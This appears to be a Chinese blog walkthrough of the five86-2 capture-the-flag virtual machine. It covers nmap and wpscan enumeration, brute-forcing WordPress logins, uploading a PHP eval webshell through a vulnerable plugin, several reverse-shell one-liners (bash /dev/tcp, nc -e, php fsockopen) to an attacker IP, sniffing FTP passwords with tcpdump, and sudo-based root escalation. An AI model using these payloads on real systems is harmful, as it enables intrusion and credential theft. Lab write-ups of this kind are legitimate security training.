five86-2靶机渗透攻略

2022年01月14日 阅读数:7
这篇文章主要向大家介绍five86-2靶机渗透攻略,主要内容包括基础应用、实用技巧、原理机制等方面,希望对大家有所帮助。

下载地址:https://www.five86.com/five86-2.html
须要修改hosts文件 添加five86-2的解析
php

信息收集

nmap扫描

nmap -sC -sV 192.168.93.0/24
html

在这里插入图片描述

192.168.93.132开放21ftp 80http
python

网站信息收集

访问80端口
web

在这里插入图片描述

在这里插入图片描述

发现cms为wordpress5.1.4,未发现有效利用漏洞
使用wpscan进行扫描
wpscan --url [http://five86-2](http://five86-2) -e ushell

扫描出几个用户admin、peter、barney、gillian、stephen
在这里插入图片描述bash

将这几个用户保存为用户名字典 ,密码字典使用kali中的rockyou.txt
使用wpscan开始爆破
wpscan --url [http://five86-2](http://five86-2) -U users -P ~/tools/z字典/kali_dic/rockyou.txt
服务器

获得两个用户
barney spooky1
stephen apollo1
在这里插入图片描述tcp

登陆barney 在插件中发现Insert or Embed Articulate Content into WordPress Trial
在这里插入图片描述svg

wprdpress web插件漏洞利用

该插件主要是能够快速的向文章中嵌入本身的学习内容(e-Learing),同时该插件能够直接对zip压缩文件进行处理,文件能够先压缩到zip中再一块儿上传到服务器中。所以咱们能够上传木马,须要上传一个html和一个php一句话wordpress

<?php echo forest; @eval($_POST['123']);?>``

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

蚁剑链接成功
在这里插入图片描述

反弹sehll
bash -i >& /dev/tcp/192.168.93.130/9999 0>&1
nc -e /bin/bash 192.168.93.130 9999
php -r '$sock=fsockopen("192.168.93.130",9999);exec("/bin/sh -i <&3 >&3 2>&3");'

老是报错。无奈直接将php反弹shell代码上传

<?php echo"shell"; $sock=fsockopen("192.168.93.130",9999);exec("/bin/sh -i <&3 >&3 2>&3"); ?>

网站访问而后发现shell秒断…
在这里插入图片描述

蚁剑直接用php执行。成功
在这里插入图片描述

python调一下bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
在这里插入图片描述

主机信息收集

cat /etc/passwd
在这里插入图片描述

发现刚刚爆破出的用户彷佛可登陆barney spooky1 / stephen apollo1
stephen登陆成功
在这里插入图片描述

没找到啥有效信息,barney又登陆不上…

转换思路到ftp服务,因为ftp明文传输,或许能获取密码
ps -aux | grep ftp 查看进程
在这里插入图片描述

可知道ftp是由用户paul用户运行

使用tcpdumpzhuabao
tcpdump -D 查看能抓的网卡
在这里插入图片描述

等待一会会抓到密码
在这里插入图片描述

paul esomepasswford

提权

sudo -l发现能够用peter无密码执行/usr/sbin/service
在这里插入图片描述

sudo -u peter service ../../bin/bash
发现切换到peter
peter能够以root身份免密执行/user/bin/passwd
在这里插入图片描述

直接修改root密码
sudo passwd root
在这里插入图片描述

root家目录下发现flag。通关
在这里插入图片描述